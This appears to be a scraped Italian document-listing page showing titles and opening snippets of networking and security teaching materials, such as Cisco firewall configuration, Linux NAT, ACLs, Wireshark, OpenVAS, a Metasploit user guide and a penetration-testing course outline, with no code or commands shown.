Connessione con MySQL

Connessione con MySQL Connessione con MySQL Architettura Server-Side Eventuali parametri cookie sessioni Elaborazione SELECT... DATABASE Quando i dati sono molti e la persistenza deve andare altre la sessione o la durata

Dettagli

Configurazione firewall Cisco ASA5505

Configurazione firewall Cisco ASA5505 Configurazione firewall Cisco ASA5505 Argomenti da trattare: Creazione della rete Assegnazione indirizzi Modifica delle impostazioni di default delle vlan esistenti Assegnazione della vlan ad una interfaccia

Dettagli

Difesa perimetrale di una rete

Difesa perimetrale di una rete Muro tagliafuoco per: Evitare accessi indesiderati Controllare traffico di dati in uscita Tagliare i flussi di I/O generati da malware Filtrare i segmenti di una VLAN azione Tipi di firewall: Ingress firewall

Dettagli

mbnetfix NHF100 La seguente guida ha come scopo di fornire le indicazioni per una configurazione di base, per

mbnetfix NHF100 La seguente guida ha come scopo di fornire le indicazioni per una configurazione di base, per mbnetfix NHF100 Guida base alla configurazione La seguente guida ha come scopo di fornire le indicazioni per una configurazione di base, per funzioni avanzate è possibile consultare il manuale completo

Dettagli

Software per l individuazione dei malfunzionamenti di rete

Software per l individuazione dei malfunzionamenti di rete Software per l individuazione dei malfunzionamenti di rete ForTIC Percorso Formativo C2 Modulo 4 Fabio Calefato - ForTIC / C2 / Modulo 4 1 Strumenti utili ipconfig / ifconfig ping tracert / traceroute

Dettagli

IP forwarding Firewall e NAT

IP forwarding Firewall e NAT IP forwarding Firewall e NAT A.A. 2004/2005 Walter Cerroni IP forwarding Linux può funzionare da gateway tra due o più reti IP host1 host2 linux-gw 192.168.10.0/24 192.168.11.0/24 Il kernel deve essere

Dettagli

Sommario ... vi Sommario

Sommario ... vi Sommario Sommario.... Introduzione xiii Capitolo 1 1 test per la certificazione Microsoft 1 Condizioni di svolgimento dei test 2 Impostazione e caratteristiche dei test 3 Uso efficace dei software di test Microsoft

Dettagli

Numero NaviDimensione Nave

Numero NaviDimensione Nave RETI INFORMATICHE - SPECIFICHE DI PROGETTO AA. 2011/2012 1 1.1RETI INFORMATICHE CORSO DI LAUREA IN INGEGNERIA INFORMATICA SPECIFICHE DI PROGETTO A.A. 2011/2012 Il progetto consiste nello sviluppo di un

Dettagli

Metasploit Framework Version 2.2 Corso Crash per Utenti

Metasploit Framework Version 2.2 Corso Crash per Utenti Metasploit Framework Version 2.2 Corso Crash per Utenti Introduzione Questo documento vuole essere una sorta di guida per l utente alla versione 2.2 del Metasploit Framework (letteralmente framework vuole

Dettagli

Ethical Hacking Basic CONTENUTI

Ethical Hacking Basic CONTENUTI Ethical Hacking Basic Durata: 5 giorni Modulo 1: Penetration Test CONTENUTI Introduzione: tipologie di Penetration Test Metodologie e standard Aspetti normativi Fasi: 1. Il Footprinting dell'infrastruttura

Dettagli

Lezione 6: Dynamic Host Configuration Protocol

Lezione 6: Dynamic Host Configuration Protocol Lezione 6: Dynamic Host Configuration Protocol Università degli Studi di Milano Insegnamento di Terminologia - 1 ISO/OSI (Open System Interconnection) IP ARP Terminologia - 1 ISO/OSI (Open System Interconnection)

Dettagli

Esercitazione 5 Firewall

Esercitazione 5 Firewall Sommario Esercitazione 5 Firewall Laboratorio di Sicurezza 2017/2018 Andrea Nuzzolese Packet Filtering ICMP Descrizione esercitazione Applicazioni da usare: Firewall: netfilter Packet sniffer: wireshark

Dettagli

Sicurezza delle reti. Monga. Configurazioni Effetti di un firewall. Stateless filtering TCP INGRESS e EGRESS SSH. Complessità del filtering SMTP

Sicurezza delle reti. Monga. Configurazioni Effetti di un firewall. Stateless filtering TCP INGRESS e EGRESS SSH. Complessità del filtering SMTP Sicurezza dei sistemi e delle 1 Mattia Lezione VIII: Pattern ricorrenti Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2013/14 1 cba 2011 14 M.. Creative Commons

Dettagli

Esercitazione. Prima di chiedere hai usato il comando man? sovente 1 settimana di esperimenti possono risparmiare 1 ora di lettura

Esercitazione. Prima di chiedere hai usato il comando man? sovente 1 settimana di esperimenti possono risparmiare 1 ora di lettura Esercitazione Avete creato una cartella nella vostra home di nome (tutto MAIUSCOLO) A4A dove mettere in disparte gli esercizi che fate (non solo quelli di oggi)? Prima di chiedere hai usato il comando

Dettagli

Il programma di gestione per il mondo della traduzione

Il programma di gestione per il mondo della traduzione SYLLXXX: Il programma di gestione per il mondo della traduzione INSTALLAZIONE Syllxxx- Versione 2.2.0 - Pag 1 Syllxxx- Versione 2.2.0 - Pag 2 Indice 1 Installazione 4 1.1 Syllxxx-PMN e Syllxxx-SMN 4 1.1.1

Dettagli

Roma2LUG. aka l aula del Pinguino. Laboratorio: Configurazione e Gestione della Rete Locale

Roma2LUG. aka l aula del Pinguino. Laboratorio: Configurazione e Gestione della Rete Locale Roma2LUG aka l aula del Pinguino in Laboratorio: Configurazione e Gestione della Rete Locale Aprile 2014 Microsoft Corporation, una Software House statunitense, annuncia il termine del supporto per il

Dettagli

Esame Laboratorio di Sistemi Operativi Cognome Nome Mat.

Esame Laboratorio di Sistemi Operativi Cognome Nome Mat. Esame Laboratorio di Sistemi Operativi 2-01-2008 Il compito è costituito da domande chiuse e domande aperte. Non è consentito l uso di libri, manuali, appunti., etc. Tempo massimo 1 ora. Domande chiuse:

Dettagli

Sicurezza dei sistemi e delle reti 1

Sicurezza dei sistemi e delle reti 1 Sicurezza dei sistemi e delle 1 Mattia Dip. di Informatica Università degli Studi di Milano, Italia mattia.monga@unimi.it a.a. 2013/14 1 cba 2011 14 M.. Creative Commons Attribuzione Condividi allo stesso

Dettagli

Antonio Cianfrani. Introduzione A.A. 2015/2016

Antonio Cianfrani. Introduzione A.A. 2015/2016 Antonio Cianfrani Introduzione A.A. 2015/2016 La rete Internet router sottoreti terminali Gli apparati di rete La pila protocollare TCP/IP Servizi Applicativi Trasporto (TCP/UDP) IP Interfaccia di sottorete

Dettagli

Antonio Cianfrani. Access Control List (ACL)

Antonio Cianfrani. Access Control List (ACL) Antonio Cianfrani Access Control List (ACL) Indice Cosa sono le ACL? Configurare una ACL standard ACL extended Named ACL Restingere l accesso alle vty Cosa sono le ACL (1/3) Sono liste di condizioni applicate

Dettagli

Vulnerability Assessment Installazione e configurazione di OpenVAS

Vulnerability Assessment Installazione e configurazione di OpenVAS Vulnerability Assessment Installazione e configurazione di OpenVAS Introduzione 1. Introduzione 2. Installazione di OpenVAS su VM Centos7 3. Esecuzione di network scan su un target di esempio 4. Valutazione

Dettagli

Attacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007

Attacchi di rete. Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007 Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2006/2007 Sommario 1 Introduzione al Portscanning 2 3 Sommario 1 Introduzione al Portscanning 2 3 Sommario

Dettagli

Atlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: True DMZ Language: Italiano

Atlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: True DMZ Language: Italiano Atlantis Land Technical Resources Product: A02-RA3/ A02-RA3+ / A02-WRA4-54G /A02-RA440 Subject: True DMZ Language: Italiano INTRODUZIONE Grazie a questa funzionalità è possibile creare una vera e propria

Dettagli

IN CEILING ACCESS POINT 300MBPS WL-ICNAP48-052

IN CEILING ACCESS POINT 300MBPS WL-ICNAP48-052 IN CEILING ACCESS POINT 300MBPS WL-ICNAP48-052 Grazie Per aver scelto un nostro prodotto INDICE Capitolo 1 Hardware ed alimentazione 1.1 Descrizione interfaccia 1.2 Alimentazione tramite adattatore PoE

Dettagli

Appello 13 Febbraio Tempo complessivo a disposizione per lo svolgimento: 2h Usare lo spazio dopo ogni Esercizio/Quesito per la risposta.

Appello 13 Febbraio Tempo complessivo a disposizione per lo svolgimento: 2h Usare lo spazio dopo ogni Esercizio/Quesito per la risposta. Fondamenti di Internet e Reti Proff. A. Capone, M. Cesana, I. Filippini, G. Maier Cognome Nome Matricola Appello 3 Febbraio 207 Tempo complessivo a disposizione per lo svolgimento: 2h Usare lo spazio dopo

Dettagli

Wireshark (packet sniffer)

Wireshark (packet sniffer) Wireshark (packet sniffer) Introduzione In computing, Wireshark (ex Ethereal) is a protocol analyzer, or "packet sniffer" application, used for network troubleshooting, analysis, software and protocol

Dettagli

Multigroup Chat in Python hosted on Raspberry PI. a cura di Raimondi Cominesi Simone & Voltolini Pietro

Multigroup Chat in Python hosted on Raspberry PI. a cura di Raimondi Cominesi Simone & Voltolini Pietro Multigroup Chat in Python hosted on Raspberry PI a cura di Raimondi Cominesi Simone & Voltolini Pietro 1 Indice Introduzione Settaggio impostazioni Raspberry o Abilitazione protocollo ssh o Abilitazione

Dettagli

SIMULAZIONE DI UN PENETRATION TEST (PENETRATION TESTING SIMULATION)

SIMULAZIONE DI UN PENETRATION TEST (PENETRATION TESTING SIMULATION) Over Security SIMULAZIONE DI UN PENETRATION TEST (PENETRATION TESTING SIMULATION) Sommario Viene presentata la simulazione di un attacco informatico, Penetration Testing, un metodo per valutare la sicurezza

Dettagli

API Socket di Berkeley

API Socket di Berkeley Laboratorio Reti di Calcolatori (A.A. 2008-2009) Programmazione di rete ed interfaccia API socket di Berkeley Delfina Malandrino delmal@dia.unisa.it http://www.dia.unisa.it/professori/delmal/ API Socket

Dettagli

Configurazione delle interfacce di rete

Configurazione delle interfacce di rete Configurazione delle interfacce di rete A.A. 2006/2007 Alessandro Botticelli Instradamento dei datagrammi IP Routing : scelta del percorso su cui inviare i dati i router formano struttura interconnessa

Dettagli

Introduzione al Networking

Introduzione al Networking Introduzione al Networking Guida introduttiva alla configurazione di rete in ambiente GNU/Linux Valeria Mazzola mazzolavale1@gmail.com Corsi GNU/Linux Avanzati 2017 Valeria Mazzola Introduzione al Networking

Dettagli

Cisco Internetwork Operating System. Introduzione

Cisco Internetwork Operating System. Introduzione Cisco Internetwork Operating System Introduzione IOS e CLI IOS: marchio registrato, nome del sistema operativo presente sulla maggior parte dei router Cisco; presente anche su alcuni switch e su routing

Dettagli

1 Concetti di base... 3

1 Concetti di base... 3 1. Concetti di base 2. Gli attacchi informatici 3. Sicurezza informatica 4. L'attività di Ethical Hacking Syllabus rev. 1.0 1 Concetti di base... 3 1.1 Concetti di base di sicurezza informatica... 3 1.1.1

Dettagli